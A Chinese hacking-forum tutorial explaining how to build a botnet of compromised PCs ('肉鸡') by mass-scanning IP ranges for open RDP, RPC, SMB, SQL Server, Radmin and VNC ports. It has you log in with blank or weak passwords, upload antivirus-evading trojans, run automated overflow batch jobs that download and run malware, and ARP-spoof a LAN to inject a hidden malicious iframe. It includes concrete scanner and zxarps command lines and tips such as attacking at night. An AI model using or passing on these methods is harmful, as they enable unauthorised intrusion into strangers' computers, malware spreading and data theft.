这里讲解下原理和方法,不具体操作演示,不方便还要控制下教程的大小,另外重要的是我认为新手朋友应该多自己动手实践下,看别人的教程演示跟着一般的做是不会有什么很大的进步,要学习思路和原理,自己动手实践,在不断的解决困难中进步。我走到今天的一点点感触,和新手分享下。

下面开始正题:

1:扫3389端口抓肉鸡
这个方法比较简单,适合新手朋友。
原理:
国内流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是默认开放3389服务的,我们就可以利用这一点来抓肉鸡。
方法:
扫描工具(如S等等)扫一段IP的3389端口,扫完后就直接用3389连接器连接开放3389的机器,也可以把结果保存为文本,用批量生成3389连接的工具生成链接,比较方便的,然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马然后安装。
这种方法只能是XP系统,如果遇到2000或者2003系统就不要试了,除非有输入法漏洞,不过现在很少了,还有那么多的3389,干嘛在它上面浪费时间呢。汗- -!
这个方法缺点也是大大的,XP只支持单用户登入,,你再登入上去就会把他挤出去,而且不可以抓国外的肉鸡。
建议:中午或者半夜行动,因为有很多的人会开着机子下载,杀毒啊,去睡觉。我们就有可乘之机了。

2:扫135端口抓肉鸡
步骤:A:
a-先用扫描器扫一段IP的135端口
b-整理一下
c-NTSCAN过滤有弱口令的机器
d-最后用recton开telnet传马
B:
有一些自动抓鸡工具,功能类似,如Bluisland,Wmi,蜜蜂,知音等等,比较傻瓜化的。
这里简单说两点:Bluisland 木马改名为 boot.exe , IP保存为ip.txt,放在同一个目录下。
Wmi 需要修改,具体看操作。
问题:因为国内的一些网络运营商屏蔽了一部分的端口,你可能扫不到135,或者扫到的135没有检测到空口令?!怎么办?!
解决:1:你要开了这3个服务就可以开通
我的电脑--管理---服务
TCP/IP NetBIOS Helper
Remote Procedure Call (RPC) Locator
NT LM Security Support Provider
2:xp打线程补丁 一般线程为1000-3000之间就可以了 如果还扫不到就打4000
打好补丁之后重启。
3:抓鸡前关掉杀软和防火墙(包括系统自带的防火墙)
4:木马一定要免杀 扫的IP范围不要太大 XP系统扫的不是很快 有条件的见意装个2000或者2003系统,可以用syn方式扫
5:换个ip段扫。可以扫下本地的ip段。
6:终极解决方案,拿个服务器扫,这是最好的方法。
或者在鸽子或者别的肉鸡上扫,上传S扫描器
首先要关防火墙 CMD命令 net stop alg /y 或者net stop sharedaccess
S扫描器命令: s.exe syn《xp的机子为tcp》 开始IP,结束IP 端口 线程/save
s.exe syn 125.108.0.0 125.108.155.255 1433 700 /save
 
3: 扫445端口抓肉鸡

扫135抓肉鸡差不多,先用扫描器扫一段IP的445端口,然后把结果整理,再用NTSCAN过滤有弱口令的机器,最后开共享传马,可以用啊D工具包。
屏蔽的话可以扫本地的445试下。

4:1433端口批量溢出抓肉鸡
 
原理:可以利用漏洞溢出实现全自动抓鸡,不过现在太多人搞,成功率不是很高。
工具:S.exe sqlhello.exe nc.exe 批处理文件
方法:先打开多个NC监听,然后再打开扫描溢出的.bat,然后你就可以去睡觉去了。自动扫描,扫描完后 自动溢出,溢出后自动下马执行。
这就是批处理的威力,希望大家有时间多专研下,我在论坛发布的有详细的批处理教程文章。
另外有42 21等端口的溢出,原理都是类似的,大家自己尝试下吧。
 
5: 扫1433弱口令抓肉鸡
工具:端口扫描器 X-scan 和 SQL综合利用工具
原理:开1433端口的机器一般都装有SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。
方法:
先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,
接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了,扫描完成后会有个报告,列出了有弱口令的机器,
然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马。
另解:WINNTAutoAttack 原理一样。
 
6:扫4899空口令抓肉鸡
工具:扫描器 4899探测器 Radmin
原理: Radmin开放的端口默认为4899.
方法:先用端口扫描器扫一段IP的4899端口
用4899探测器导入开了4899端口的IP,过滤下
Radmin连接有空口令的机器,带开文件管理,上传运行你木马
 
7: 扫5900端口抓VNC肉鸡 工具:VNC扫描器 VNC连接器
原理:VNC开放5900端口
方法:先用VNC扫描器扫描一段IP的5900端口,
扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv 建议扫国外的ip段,国外用这个的比较多,一般机子也不错的。
扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有为vulnerable才能连接。接着就用VNC连接器连接。
 
8: ARP局域网欺骗挂马
ARP命令: zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"
这里网马地址就假设为 [url]http://www.pxhack.com/[/url] 那么命令就是
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='http://www.pxhack.com/' width=0 height=0>"
接上 3389 服务器 服务器必须安装 winPcap.exe 工具都有打包
然后就执行 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='http://www.pxhack.com/' width=0 height=0>" IP自己改
zxarps.exe是免杀的 先安装WinPcap_4_0.exe 然后运行1.bat的批处理 输入命令zxarps.exe就可以了
这样就可以把马挂上拉 如果拿到一台内网机器 整个机房的机器都可以挂上马